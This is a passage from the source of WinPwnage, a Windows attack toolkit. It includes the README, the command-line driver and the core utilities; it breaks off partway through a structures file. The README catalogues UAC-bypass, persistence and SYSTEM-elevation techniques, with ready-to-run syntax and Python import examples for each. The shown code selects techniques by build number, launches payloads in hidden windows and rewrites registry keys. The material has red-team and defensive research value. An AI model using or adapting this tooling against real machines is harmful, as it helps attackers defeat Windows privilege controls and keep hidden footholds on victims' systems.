├── README.md ├── main.py └── winpwnage ├── __init__.py ├── core ├── __init__.py ├── prints.py ├── scanner.py ├── utils.py └── winstructures.py └── functions ├── __init__.py ├── elevate ├── __init__.py ├── elevateMethod1.py ├── elevateMethod2.py ├── elevateMethod3.py ├── elevateMethod4.py ├── elevateMethod5.py ├── elevateMethod6.py └── elevateMethod7.py ├── persist ├── __init__.py ├── persistMethod1.py ├── persistMethod10.py ├── persistMethod11.py ├── persistMethod12.py ├── persistMethod2.py ├── persistMethod3.py ├── persistMethod4.py ├── persistMethod5.py ├── persistMethod6.py ├── persistMethod7.py ├── persistMethod8.py └── persistMethod9.py └── uac ├── __init__.py ├── uacMethod1.py ├── uacMethod10.py ├── uacMethod11.py ├── uacMethod12.py ├── uacMethod13.py ├── uacMethod14.py ├── uacMethod15.py ├── uacMethod2.py ├── uacMethod3.py ├── uacMethod4.py ├── uacMethod5.py ├── uacMethod6.py ├── uacMethod7.py ├── uacMethod8.py └── uacMethod9.py /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 |

4 | 5 | --- 6 | 7 | [![build_status](https://travis-ci.com/rootm0s/WinPwnage.svg?branch=master)](https://travis-ci.com/rootm0s/WinPwnage) 8 | ![python3_support](https://img.shields.io/badge/Python-3-blue.svg "Python 3") 9 | 10 | * [Build into single executable](#building) 11 | * [Scan for compatible methods](#scanning) 12 | * [Importing and usage as module](#importing) 13 | * [UAC-bypass techniques](#uac-bypass-techniques) 14 | * [Persistence techniques](#persistence-techniques) 15 | * [Elevation techniques](#elevation-techniques) 16 | 17 | ## Disclaimer 18 | This tool is provided for educational and research purposes only. The authors of this project are no way responsible for any misuse of this tool. 19 | 20 | ## Building 21 | This build works on Python >= 3.6 and puts the .exe file into the __dist__ directory. Install pyinstaller using pip command: 22 | ```batch 23 | pip install pyinstaller 24 | ``` 25 | And run the following command: 26 | ```batch 27 | pyinstaller --onefile main.py 28 | ``` 29 | 30 | ## Scanning 31 | Compares build number against 'Fixed In' build numbers and displays the results. 32 | ```batch 33 | main.py --scan uac 34 | main.py --scan persist 35 | main.py --scan elevate 36 | ``` 37 | 38 | Example results when scanning for possible UAC methods 39 | ``` 40 | Id: Type: Compatible: Description: 41 | ---- ------ ----------- ------------- 42 | 1 UAC bypass No UAC bypass using runas 43 | 2 UAC bypass Yes UAC bypass using fodhelper.exe 44 | 3 UAC bypass Yes UAC bypass using slui.exe 45 | 4 UAC bypass Yes UAC bypass using silentcleanup scheduled task 46 | 5 UAC bypass No UAC bypass using sdclt.exe (isolatedcommand) 47 | 6 UAC bypass No UAC bypass using sdclt.exe (App Paths) 48 | 7 UAC bypass No UAC bypass using perfmon.exe 49 | ``` 50 | 51 | ## Importing 52 | Bypass UAC using uacMethod2 53 | ```python 54 | from winpwnage.functions.uac.uacMethod2 import uacMethod2 55 | uacMethod2(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"]) 56 | ``` 57 | 58 | Persist on system using persistMethod4 59 | ```python 60 | from winpwnage.functions.persist.persistMethod4 import persistMethod4 61 | persistMethod4(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"], add=True) 62 | 63 | # Removal 64 | persistMethod4(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"], add=False) 65 | ``` 66 | 67 | Elevate from administrator to SYSTEM using elevateMethod1 68 | ```python 69 | from winpwnage.functions.elevate.elevateMethod1 import elevateMethod1 70 | elevateMethod1(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"]) 71 | ``` 72 | 73 | ## UAC bypass techniques 74 |
75 | Functions (Expand/Collapse) 76 | 77 | * UAC bypass using runas 78 | * Id: 1 79 | * Method: Windows API, this only works if UAC is set to never notify 80 | * Syntax: `main.py --use uac --id 1 --payload c:\\windows\\system32\\cmd.exe` 81 | * Works from: 7600 82 | * Fixed in: n/a 83 | * UAC bypass using fodhelper.exe 84 | * Id: 2 85 | * Method: Registry key (Class) manipulation 86 | * Syntax: `main.py --use uac --id 2 --payload c:\\windows\\system32\\cmd.exe` 87 | * Works from: 10240 88 | * Fixed in: n/a 89 | * UAC bypass using slui.exe 90 | * Id: 3 91 | * Method: Registry key (Class) manipulation 92 | * Syntax: `main.py --use uac --id 3 --payload c:\\windows\\system32\\cmd.exe` 93 | * Works from: 9600 94 | * Fixed in: n/a 95 | * UAC bypass using silentcleanup scheduled task 96 | * Id: 4 97 | * Method: Registry key (Environment) manipulation, this bypasses UAC's Always Notify. 98 | * Syntax: `main.py --use uac --id 4 --payload c:\\windows\\system32\\cmd.exe` 99 | * Works from: 9600 100 | * Fixed in: n/a 101 | * UAC bypass using sdclt.exe (isolatedcommand) 102 | * Id: 5 103 | * Method: Registry key (Class) manipulation 104 | * Syntax: `main.py --use uac --id 5 --payload c:\\windows\\system32\\cmd.exe` 105 | * Works from: 10240 106 | * Fixed in: 17025 107 | * UAC bypass using sdclt.exe (App Paths) 108 | * Id: 6 109 | * Method: Registry key (App Paths) manipulation 110 | * Syntax: `main.py --use uac --id 6 --payload c:\\windows\\system32\\cmd.exe` 111 | * Works from: 10240 112 | * Fixed in: 16215 113 | * UAC bypass using perfmon.exe 114 | * Id: 7 115 | * Method: Registry key (Volatile Environment) manipulation 116 | * Syntax: `main.py --use uac --id 7 --payload c:\\windows\\system32\\cmd.exe` 117 | * Works from: 7600 118 | * Fixed in: 16299 119 | * UAC bypass using eventvwr.exe 120 | * Id: 8 121 | * Method: Registry key (Class) manipulation 122 | * Syntax: `main.py --use uac --id 8 --payload c:\\windows\\system32\\cmd.exe` 123 | * Works from: 7600 124 | * Fixed in: 15031 125 | * UAC bypass using compmgmtlauncher.exe 126 | * Id: 9 127 | * Method: Registry key (Class) manipulation 128 | * Syntax: `main.py --use uac --id 9 --payload c:\\windows\\system32\\cmd.exe` 129 | * Works from: 7600 130 | * Fixed in: 15031 131 | * UAC bypass using computerdefaults.exe 132 | * Id: 10 133 | * Method: Registry key (Class) manipulation 134 | * Syntax: `main.py --use uac --id 10 --payload c:\\windows\\system32\\cmd.exe` 135 | * Works from: 10240 136 | * Fixed in: n/a 137 | * UAC bypass using token manipulation 138 | * Id: 11 139 | * Method: Token manipulation 140 | * Syntax: `main.py --use uac --id 11 --payload c:\\windows\\system32\\cmd.exe` 141 | * Works from: 7600 142 | * Fixed in: 17686 143 | * UAC bypass using sdclt.exe (Folder) 144 | * Id: 12 145 | * Method: Registry key (Class) manipulation 146 | * Syntax: `main.py --use uac --id 12 --payload c:\\windows\\system32\\cmd.exe` 147 | * Works from: 14393 148 | * Fixed in: n/a 149 | * UAC bypass using cmstp.exe 150 | * Id: 13 151 | * Method: Malicious ini file 152 | * Syntax: `main.py --use uac --id 13 --payload c:\\windows\\system32\\cmd.exe` 153 | * Works from: 7600 154 | * Fixed in: n/a 155 | * UAC bypass using wsreset.exe 156 | * Id: 14 157 | * Method: Registry key (Class) manipulation 158 | * Syntax: `main.py --use uac --id 14 --payload c:\\windows\\system32\\cmd.exe` 159 | * Works from: 17134 160 | * Fixed in: n/a 161 | * UAC bypass using slui.exe and changepk.exe 162 | * Id: 15 163 | * Method: Registry key (Class) manipulation 164 | * Syntax: `main.py --use uac --id 15 --payload c:\\windows\\system32\\cmd.exe` 165 | * Works from: 17763 166 | * Fixed in: n/a 167 |
168 | 169 | ## Persistence techniques 170 |
171 | Functions (Expand/Collapse) 172 | 173 | * Persistence using mofcomp.exe (SYSTEM privileges) 174 | * Id: 1 175 | * Method: Malicious mof file using EventFilter EventConsumer and binding 176 | * Syntax: `main.py --use persist --id 1 --payload c:\\windows\\system32\\cmd.exe` 177 | * Syntax for removing: `main.py --use persist --id 1 --payload c:\\windows\\system32\\cmd.exe --remove` 178 | * Requires: Administrator rights 179 | * Works from: 7600 180 | * Fixed in: n/a 181 | * Persistence using schtasks.exe (SYSTEM privileges) 182 | * Id: 2 183 | * Method: Malicious scheduled task 184 | * Syntax: `main.py --use persist --id 2 --payload c:\\windows\\system32\\cmd.exe` 185 | * Syntax for removing: `main.py --use persist --id 2 --payload c:\\windows\\system32\\cmd.exe --remove` 186 | * Requires: Administrator rights 187 | * Works from: 7600 188 | * Fixed in: n/a 189 | * Persistence using image file execution option and magnifier.exe 190 | * Id: 3 191 | * Method: Image File Execution Options debugger and accessibility application 192 | * Syntax: `main.py --use persist --id 3 --payload c:\\windows\\system32\\cmd.exe` 193 | * Syntax for removing: `main.py --use persist --id 3 --payload c:\\windows\\system32\\cmd.exe --remove` 194 | * Requires: Administrator rights 195 | * Works from: 7600 196 | * Fixed in: n/a 197 | * Persistence using userinit key 198 | * Id: 4 199 | * Method: Registry key (UserInit) manipulation 200 | * Syntax: `main.py --use persist --id 4 --payload c:\\windows\\system32\\cmd.exe` 201 | * Syntax for removing: `main.py --use persist --id 4 --payload c:\\windows\\system32\\cmd.exe --remove` 202 | * Requires: Administrator rights 203 | * Works from: 7600 204 | * Fixed in: n/a 205 | * Persistence using HKCU run key 206 | * Id: 5 207 | * Method: Registry key (HKCU Run) manipulation 208 | * Syntax: `main.py --use persist --id 5 --payload c:\\windows\\system32\\cmd.exe` 209 | * Syntax for removing: `main.py --use persist --id 5 --payload c:\\windows\\system32\\cmd.exe --remove` 210 | * Requires: n/a 211 | * Works from: 7600 212 | * Fixed in: n/a 213 | * Persistence using HKLM run key 214 | * Id: 6 215 | * Method: Registry key (HKLM Run) manipulation 216 | * Syntax: `main.py --use persist --id 6 --payload c:\\windows\\system32\\cmd.exe` 217 | * Syntax for removing: `main.py --use persist --id 6 --payload c:\\windows\\system32\\cmd.exe --remove` 218 | * Requires: Administrator rights 219 | * Works from: 7600 220 | * Fixed in: n/a 221 | * Persistence using wmic.exe (SYSTEM privileges) 222 | * Id: 7 223 | * Method: Malicious mof file using EventFilter EventConsumer and binding 224 | * Syntax: `main.py --use persist --id 7 --payload c:\\windows\\system32\\cmd.exe` 225 | * Syntax for removing: `main.py --use persist --id 7 --payload c:\\windows\\system32\\cmd.exe --remove` 226 | * Requires: Administrator rights 227 | * Works from: 7600 228 | * Fixed in: n/a 229 | * Persistence using startup files 230 | * Id: 8 231 | * Method: Malicious lnk file in startup directory 232 | * Syntax: `main.py --use persist --id 8 --payload c:\\windows\\system32\\cmd.exe` 233 | * Syntax for removing: `main.py --use persist --id 8 --payload c:\\windows\\system32\\cmd.exe --remove` 234 | * Requires: n/a 235 | * Works from: 7600 236 | * Fixed in: n/a 237 | * Persistence using cortana windows app 238 | * Id: 9 239 | * Method: Registry key (Class) manipulation 240 | * Syntax: `main.py --use persist --id 9 --payload c:\\windows\\system32\\cmd.exe` 241 | * Syntax for removing: `main.py --use persist --id 9 --payload c:\\windows\\system32\\cmd.exe --remove` 242 | * Requires: n/a 243 | * Works from: 14393 244 | * Fixed in: n/a 245 | * Persistence using people windows app 246 | * Id: 10 247 | * Method: Registry key (Class) manipulation 248 | * Syntax: `main.py --use persist --id 10 --payload c:\\windows\\system32\\cmd.exe` 249 | * Syntax for removing: `main.py --use persist --id 10 --payload c:\\windows\\system32\\cmd.exe --remove` 250 | * Requires: n/a 251 | * Works from: 14393 252 | * Fixed in: n/a 253 | * Persistence using bitsadmin.exe 254 | * Id: 11 255 | * Method: Malicious bitsadmin job 256 | * Syntax: `main.py --use persist --id 11 --payload c:\\windows\\system32\\cmd.exe` 257 | * Syntax for removing: `main.py --use persist --id 11 --payload c:\\windows\\system32\\cmd.exe --remove` 258 | * Requires: Administrator rights 259 | * Works from: 7600 260 | * Fixed in: n/a 261 | * Persistence using Windows Service (SYSTEM privileges) 262 | * Id: 12 263 | * Method: Malicious Windows Service 264 | * Syntax: `main.py --use persist --id 12 --payload c:\\windows\\system32\\cmd.exe` 265 | * Syntax for removing: `main.py --use persist --id 12 --payload c:\\windows\\system32\\cmd.exe --remove` 266 | * Requires: Administrator rights 267 | * Works from: 7600 268 | * Fixed in: n/a 269 |
270 | 271 | ## Elevation techniques 272 |
273 | Functions (Expand/Collapse) 274 | 275 | * Elevate from administrator to NT AUTHORITY SYSTEM using handle inheritance 276 | * Id: 1 277 | * Method: Handle inheritance 278 | * Syntax: `main.py --use elevate --id 1 --payload c:\\windows\\system32\\cmd.exe` 279 | * Requires: Administrator rights 280 | * Works from: 7600 281 | * Fixed in: n/a 282 | * Elevate from administrator to NT AUTHORITY SYSTEM using token impersonation 283 | * Id: 2 284 | * Method: Token impersonation 285 | * Syntax: `main.py --use elevate --id 2 --payload c:\\windows\\system32\\cmd.exe` 286 | * Requires: Administrator rights 287 | * Works from: 7600 288 | * Fixed in: n/a 289 | * Elevate from administrator to NT AUTHORITY SYSTEM using named pipe impersonation 290 | * Id: 3 291 | * Method: Named pipe impersonation 292 | * Syntax: `main.py --use elevate --id 3 --payload c:\\windows\\system32\\cmd.exe` 293 | * Requires: Administrator rights 294 | * Works from: 7600 295 | * Fixed in: n/a 296 | * Elevate from administrator to NT AUTHORITY SYSTEM using schtasks.exe (non interactive) 297 | * Id: 4 298 | * Method: Malicious scheduled task that gets deleted once used 299 | * Syntax: `main.py --use elevate --id 4 --payload c:\\windows\\system32\\cmd.exe` 300 | * Requires: Administrator rights 301 | * Works from: 7600 302 | * Fixed in: n/a 303 | * Elevate from administrator to NT AUTHORITY SYSTEM using wmic.exe (non interactive) 304 | * Id: 5 305 | * Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used 306 | * Syntax: `main.py --use elevate --id 5 --payload c:\\windows\\system32\\cmd.exe` 307 | * Requires: Administrator rights 308 | * Works from: 7600 309 | * Fixed in: n/a 310 | * Elevate from administrator to NT AUTHORITY SYSTEM using Windows Service (non interactive) 311 | * Id: 6 312 | * Method: Malicious Windows Service that gets deleted once used 313 | * Syntax: `main.py --use elevate --id 6 --payload c:\\windows\\system32\\cmd.exe` 314 | * Requires: Administrator rights 315 | * Works from: 7600 316 | * Fixed in: n/a 317 | * Elevate from administrator to NT AUTHORITY SYSTEM using mofcomp.exe (non interactive) 318 | * Id: 7 319 | * Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used 320 | * Syntax: `main.py --use elevate --id 7 --payload c:\\windows\\system32\\cmd.exe` 321 | * Requires: Administrator rights 322 | * Works from: 7600 323 | * Fixed in: n/a 324 |
325 | 326 | ## Read 327 | * https://wikileaks.org/ciav7p1/cms/page_2621770.html 328 | * https://wikileaks.org/ciav7p1/cms/page_2621767.html 329 | * https://wikileaks.org/ciav7p1/cms/page_2621760.html 330 | * https://msdn.microsoft.com/en-us/library/windows/desktop/bb736357(v=vs.85).aspx 331 | * https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ 332 | * https://github.com/winscripting/UAC-bypass/ 333 | * https://www.greyhathacker.net/?p=796 334 | * https://github.com/hfiref0x/UACME 335 | * https://bytecode77.com/hacking/exploits/uac-bypass/performance-monitor-privilege-escalation 336 | * https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation 337 | * https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20workshops/DEFCON-25-Workshop-Ruben-Boobeb-UAC-0day-All-Day.pdf 338 | * https://lolbas-project.github.io 339 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import print_info 2 | from winpwnage.core.scanner import scanner, function 3 | from winpwnage.core.utils import * 4 | import argparse 5 | import sys 6 | 7 | print(""" 8 | _ 9 | _ _ _|_|___ ___ _ _ _ ___ ___ ___ ___ 10 | | | | | | | . | | | | | .'| . | -_| 11 | |_____|_|_|_| _|_____|_|_|__,|_ |___| 12 | |_| |___| 13 | """) 14 | 15 | print_info("UAC level: {}".format(information().uac_level())) 16 | print_info("Build number: {}".format(information().build_number())) 17 | print_info("Running elevated: {}".format(information().admin())) 18 | print_info("Python version: {}.{}.{}\n".format(*sys.version_info)) 19 | 20 | def main(): 21 | scan_cmds = ["uac", "persist", "elevate"] 22 | 23 | parser = argparse.ArgumentParser() 24 | parser.add_argument("-s", "--scan", nargs="+", required=False, help="Scan for either uac, persist or elevate method") 25 | parser.add_argument("-u", "--use", nargs="+", required=False, help="Use either uac, persist or elevate method") 26 | parser.add_argument("-i", "--id", nargs="+", required=False, help="Id of method") 27 | parser.add_argument("-p", "--payload", nargs="+", required=False, help="Full path to payload, can include params") 28 | parser.add_argument("-r", "--remove", action="store_true", required=False, help="Removes installed persistence") 29 | args = parser.parse_args() 30 | 31 | if args.scan: 32 | if not all([_ in scan_cmds for _ in args.scan]): 33 | parser.print_help() 34 | 35 | scanner(**{scan_cmds[_]: scan_cmds[_] in args.scan for _ in range(3)}).start() 36 | 37 | if args.use and args.id: 38 | if not all([_ in scan_cmds for _ in args.use]): 39 | parser.print_help() 40 | 41 | if scan_cmds[0] in args.use and args.payload: 42 | function(uac=True, persist=False, elevate=False).run(id=args.id[0], payload=args.payload) 43 | 44 | if scan_cmds[1] in args.use: 45 | function(uac=False, persist=True, elevate=False).run(id=args.id[0], payload=args.payload, 46 | add=(False if args.remove else True)) 47 | 48 | if scan_cmds[2] in args.use and args.payload: 49 | function(uac=False, persist=False, elevate=True).run(id=args.id[0], payload=args.payload) 50 | 51 | if __name__ == "__main__": 52 | main() -------------------------------------------------------------------------------- /winpwnage/__init__.py: -------------------------------------------------------------------------------- 1 | #init -------------------------------------------------------------------------------- /winpwnage/core/__init__.py: -------------------------------------------------------------------------------- 1 | #init -------------------------------------------------------------------------------- /winpwnage/core/prints.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | 3 | table = """ 4 | Id: Type: Compatible: Description: 5 | ---- ------ ----------- -------------""" 6 | 7 | class Constant: 8 | output = [] 9 | 10 | def reset_output(): 11 | Constant.output = [] 12 | 13 | def print_table(): 14 | print(table) 15 | Constant.output.append(("t", table)) 16 | 17 | def table_success(id, type, description): 18 | print(" {}\t{}\tYes\t\t{}".format(id, type, description)) 19 | Constant.output.append(("ok", id + type + description)) 20 | 21 | def table_error(id, type, description): 22 | print(" {}\t{}\tNo\t\t{}".format(id, type, description)) 23 | Constant.output.append(("error", id + type + description)) 24 | 25 | def print_success(message): 26 | print(" [+] " + message) 27 | Constant.output.append(("ok", message)) 28 | 29 | def print_error(message): 30 | print(" [-] " + message) 31 | Constant.output.append(("error", message)) 32 | 33 | def print_info(message): 34 | print(" [!] " + message) 35 | Constant.output.append(("info", message)) 36 | 37 | def print_warning(message): 38 | print(" [!] " + message) 39 | Constant.output.append(("warning", message)) -------------------------------------------------------------------------------- /winpwnage/core/scanner.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import print_info, print_error, print_table, table_success, table_error, Constant 2 | from winpwnage.core.utils import information 3 | from winpwnage.functions.uac.uacMethod1 import * 4 | from winpwnage.functions.uac.uacMethod2 import * 5 | from winpwnage.functions.uac.uacMethod3 import * 6 | from winpwnage.functions.uac.uacMethod4 import * 7 | from winpwnage.functions.uac.uacMethod5 import * 8 | from winpwnage.functions.uac.uacMethod6 import * 9 | from winpwnage.functions.uac.uacMethod7 import * 10 | from winpwnage.functions.uac.uacMethod8 import * 11 | from winpwnage.functions.uac.uacMethod9 import * 12 | from winpwnage.functions.uac.uacMethod10 import * 13 | from winpwnage.functions.uac.uacMethod11 import * 14 | from winpwnage.functions.uac.uacMethod12 import * 15 | from winpwnage.functions.uac.uacMethod13 import * 16 | from winpwnage.functions.uac.uacMethod14 import * 17 | from winpwnage.functions.uac.uacMethod15 import * 18 | from winpwnage.functions.persist.persistMethod1 import * 19 | from winpwnage.functions.persist.persistMethod2 import * 20 | from winpwnage.functions.persist.persistMethod3 import * 21 | from winpwnage.functions.persist.persistMethod4 import * 22 | from winpwnage.functions.persist.persistMethod5 import * 23 | from winpwnage.functions.persist.persistMethod6 import * 24 | from winpwnage.functions.persist.persistMethod7 import * 25 | from winpwnage.functions.persist.persistMethod8 import * 26 | from winpwnage.functions.persist.persistMethod9 import * 27 | from winpwnage.functions.persist.persistMethod10 import * 28 | from winpwnage.functions.persist.persistMethod11 import * 29 | from winpwnage.functions.persist.persistMethod12 import * 30 | from winpwnage.functions.elevate.elevateMethod1 import * 31 | from winpwnage.functions.elevate.elevateMethod2 import * 32 | from winpwnage.functions.elevate.elevateMethod3 import * 33 | from winpwnage.functions.elevate.elevateMethod4 import * 34 | from winpwnage.functions.elevate.elevateMethod5 import * 35 | from winpwnage.functions.elevate.elevateMethod6 import * 36 | from winpwnage.functions.elevate.elevateMethod7 import * 37 | 38 | functions = { 39 | "uac": ( 40 | uacMethod1_info, 41 | uacMethod2_info, 42 | uacMethod3_info, 43 | uacMethod4_info, 44 | uacMethod5_info, 45 | uacMethod6_info, 46 | uacMethod7_info, 47 | uacMethod8_info, 48 | uacMethod9_info, 49 | uacMethod10_info, 50 | uacMethod11_info, 51 | uacMethod12_info, 52 | uacMethod13_info, 53 | uacMethod14_info, 54 | uacMethod15_info 55 | ), 56 | "persist": ( 57 | persistMethod1_info, 58 | persistMethod2_info, 59 | persistMethod3_info, 60 | persistMethod4_info, 61 | persistMethod5_info, 62 | persistMethod6_info, 63 | persistMethod7_info, 64 | persistMethod8_info, 65 | persistMethod9_info, 66 | persistMethod10_info, 67 | persistMethod11_info 68 | ), 69 | "elevate": ( 70 | elevateMethod1_info, 71 | elevateMethod2_info, 72 | elevateMethod3_info, 73 | elevateMethod4_info, 74 | elevateMethod5_info, 75 | elevateMethod6_info, 76 | elevateMethod7_info 77 | ) 78 | } 79 | 80 | class scanner(): 81 | def __init__(self, uac=True, persist=True, elevate=True): 82 | self.uac = uac 83 | self.persist = persist 84 | self.elevate = elevate 85 | Constant.output = [] 86 | 87 | def start(self): 88 | print_info("Comparing build number ({buildnumber}) against 'Fixed In' build numbers".format(buildnumber=information().build_number())) 89 | print_table() 90 | for i in functions: 91 | if i == "uac" and not self.uac or i == "persist" and not self.persist or i == "elevate" and not self.elevate: 92 | continue 93 | 94 | for info in functions[i]: 95 | if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]): 96 | table_success(id=info["Id"], type=info["Type"], description=info["Description"]) 97 | else: 98 | table_error(id=info["Id"], type=info["Type"], description=info["Description"]) 99 | return Constant.output 100 | 101 | class function(): 102 | def __init__(self, uac=True, persist=True, elevate=True): 103 | self.uac = uac 104 | self.persist = persist 105 | self.elevate = elevate 106 | Constant.output = [] 107 | 108 | def run(self, id, payload, **kwargs): 109 | print_info("Attempting to run method ({id}) configured with payload ({payload})".format(id=id, payload=payload)) 110 | for i in functions: 111 | if i == "uac" and not self.uac or i == "persist" and not self.persist or i == "elevate" and not self.elevate: 112 | continue 113 | 114 | for info in functions[i]: 115 | if id in str(info["Id"]): 116 | if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]): 117 | f = globals()[info["Function Name"]] 118 | if "name" not in f.__code__.co_varnames and "add" in f.__code__.co_varnames: 119 | f(payload, add=kwargs.get("add", True)) 120 | elif "name" in f.__code__.co_varnames and "add" in f.__code__.co_varnames: 121 | f(payload, name=kwargs.get("name", "WinPwnage"), add=kwargs.get("add", True)) 122 | else: 123 | f(payload) 124 | else: 125 | print_error("Technique not compatible with this system.") 126 | return Constant.output 127 | else: 128 | pass -------------------------------------------------------------------------------- /winpwnage/core/utils.py: -------------------------------------------------------------------------------- 1 | import os 2 | import ctypes 3 | import platform 4 | 5 | try: 6 | import _winreg # Python 2 7 | except ImportError: # Python 3 8 | import winreg as _winreg 9 | 10 | from .winstructures import * 11 | 12 | class disable_fsr(): 13 | disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection 14 | revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection 15 | 16 | def __enter__(self): 17 | self.old_value = ctypes.c_long() 18 | self.success = self.disable(ctypes.byref(self.old_value)) 19 | 20 | def __exit__(self, type, value, traceback): 21 | if self.success: 22 | self.revert(self.old_value) 23 | 24 | class payloads(): 25 | def exe(self, payload): 26 | if os.path.isfile(os.path.join(payload[0])) and payload[0].endswith(".exe"): 27 | commandline = "" 28 | for index, object in enumerate(payload): 29 | if index >= len(payload)-1: 30 | commandline += payload[index] 31 | else: 32 | commandline += payload[index] + " " 33 | return True, commandline 34 | else: 35 | return False 36 | 37 | class process(): 38 | def create(self, payload, params="", window=False, get_exit_code=False): 39 | shinfo = ShellExecuteInfoW() 40 | shinfo.cbSize = sizeof(shinfo) 41 | shinfo.fMask = SEE_MASK_NOCLOSEPROCESS 42 | shinfo.lpFile = payload 43 | shinfo.nShow = SW_SHOW if window else SW_HIDE 44 | shinfo.lpParameters = params 45 | 46 | if ShellExecuteEx(byref(shinfo)): 47 | if get_exit_code: 48 | ctypes.windll.kernel32.WaitForSingleObject(shinfo.hProcess, -1) 49 | i = ctypes.c_int(0) 50 | pi = ctypes.pointer(i) 51 | if ctypes.windll.kernel32.GetExitCodeProcess(shinfo.hProcess, pi) != 0: 52 | return i.value 53 | 54 | return True 55 | else: 56 | return False 57 | 58 | def runas(self, payload, params=""): 59 | shinfo = ShellExecuteInfoW() 60 | shinfo.cbSize = sizeof(shinfo) 61 | shinfo.fMask = SEE_MASK_NOCLOSEPROCESS 62 | shinfo.lpVerb = "runas" 63 | shinfo.lpFile = payload 64 | shinfo.nShow = SW_SHOW 65 | shinfo.lpParameters = params 66 | try: 67 | return bool(ShellExecuteEx(byref(shinfo))) 68 | except Exception as error: 69 | return False 70 | 71 | def enum_processes(self): 72 | size = 0x1000 73 | cbBytesReturned = DWORD() 74 | unit = sizeof(DWORD) 75 | dwOwnPid = os.getpid() 76 | while 1: 77 | process_ids = (DWORD * (size // unit))() 78 | cbBytesReturned.value = size 79 | EnumProcesses(byref(process_ids), cbBytesReturned, byref(cbBytesReturned)) 80 | returned = cbBytesReturned.value 81 | if returned < size: 82 | break 83 | size = size + 0x1000 84 | process_id_list = list() 85 | for pid in process_ids: 86 | if pid is None: 87 | break 88 | if pid == dwOwnPid and pid == 0: 89 | continue 90 | process_id_list.append(pid) 91 | return process_id_list 92 | 93 | def enum_process_names(self): 94 | pid_to_name = {} 95 | for pid in self.enum_processes(): 96 | name = False 97 | try: 98 | process_handle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid) 99 | except Exception as e: 100 | continue 101 | name = get_process_name(process_handle) 102 | if name: 103 | pid_to_name[pid] = name 104 | if process_handle: 105 | CloseHandle(process_handle) 106 | return pid_to_name 107 | 108 | def get_process_pid(self, processname): 109 | for pid, name in self.enum_process_names().items(): 110 | if processname in name: 111 | return pid 112 | 113 | def terminate(self, processname): 114 | pid = self.get_process_pid(processname) 115 | if pid: 116 | try: 117 | phandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid) 118 | os.kill(pid, phandle) 119 | return True 120 | except Exception: 121 | pass 122 | return False 123 | 124 | class registry(): 125 | def __init__(self): 126 | self.hkeys = { 127 | "hkcu": _winreg.HKEY_CURRENT_USER, 128 | "hklm": _winreg.HKEY_LOCAL_MACHINE 129 | } 130 | 131 | def modify_key(self, hkey, path, name, value, create=False): 132 | try: 133 | if not create: 134 | key = _winreg.OpenKey(self.hkeys[hkey], path, 0, _winreg.KEY_ALL_ACCESS) 135 | else: 136 | key = _winreg.CreateKey(self.hkeys[hkey], os.path.join(path)) 137 | _winreg.SetValueEx(key, name, 0, _winreg.REG_SZ, value) 138 | _winreg.CloseKey(key) 139 | return True 140 | except Exception as e: 141 | return False 142 | 143 | def remove_key(self, hkey, path, name="", delete_key=False): 144 | try: 145 | if delete_key: 146 | _winreg.DeleteKey(self.hkeys[hkey], path) 147 | else: 148 | key = _winreg.OpenKey(self.hkeys[hkey], path, 0, _winreg.KEY_ALL_ACCESS) 149 | _winreg.DeleteValue(key, name) 150 | _winreg.CloseKey(key) 151 | return True 152 | except Exception as e: 153 | return False 154 | 155 | class information(): 156 | def system_directory(self): 157 | return os.path.join(os.environ.get("windir"), "system32") 158 | 159 | def system_drive(self): 160 | return os.environ.get("systemdrive") 161 | 162 | def windows_directory(self): 163 | return os.environ.get("windir") 164 | 165 | def architecture(self): 166 | return platform.machine() 167 | 168 | def admin(self): 169 | return bool(ctypes.windll.shell32.IsUserAnAdmin()) 170 | 171 | def build_number(self): 172 | try: 173 | key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, os.path.join("Software\\Microsoft\\Windows NT\\CurrentVersion"), 0, _winreg.KEY_READ) 174 | cbn = _winreg.QueryValueEx(key, "CurrentBuildNumber") 175 | _winreg.CloseKey(key) 176 | except Exception as error: 177 | return False 178 | else: 179 | return cbn[0] 180 | 181 | def uac_level(self): 182 | try: 183 | key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, os.path.join("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"), 0, _winreg.KEY_READ) 184 | cpba = _winreg.QueryValueEx(key, "ConsentPromptBehaviorAdmin") 185 | cpbu = _winreg.QueryValueEx(key, "ConsentPromptBehaviorUser") 186 | posd = _winreg.QueryValueEx(key, "PromptOnSecureDesktop") 187 | _winreg.CloseKey(key) 188 | except Exception as error: 189 | return False 190 | else: 191 | cpba_cpbu_posd = (cpba[0], cpbu[0], posd[0]) 192 | return {(0, 3, 0): 1, (5, 3, 0): 2, (5, 3, 1): 3, (2, 3, 1): 4}.get(cpba_cpbu_posd, False) 193 | -------------------------------------------------------------------------------- /winpwnage/core/winstructures.py: -------------------------------------------------------------------------------- 1 | from ctypes.wintypes import * 2 | from ctypes import * 3 | import ctypes 4 | import enum 5 | 6 | # Wintypes 7 | INT = c_int 8 | LPWSTR = c_wchar_p 9 | LPVOID = c_void_p 10 | LPCSTR = c_char_p 11 | DWORD = c_uint32 12 | SIZE_T = c_size_t 13 | PVOID = c_void_p 14 | LPTSTR = c_void_p 15 | LPBYTE = c_char_p 16 | LPCTSTR = c_char_p 17 | NTSTATUS = c_ulong 18 | LPDWORD 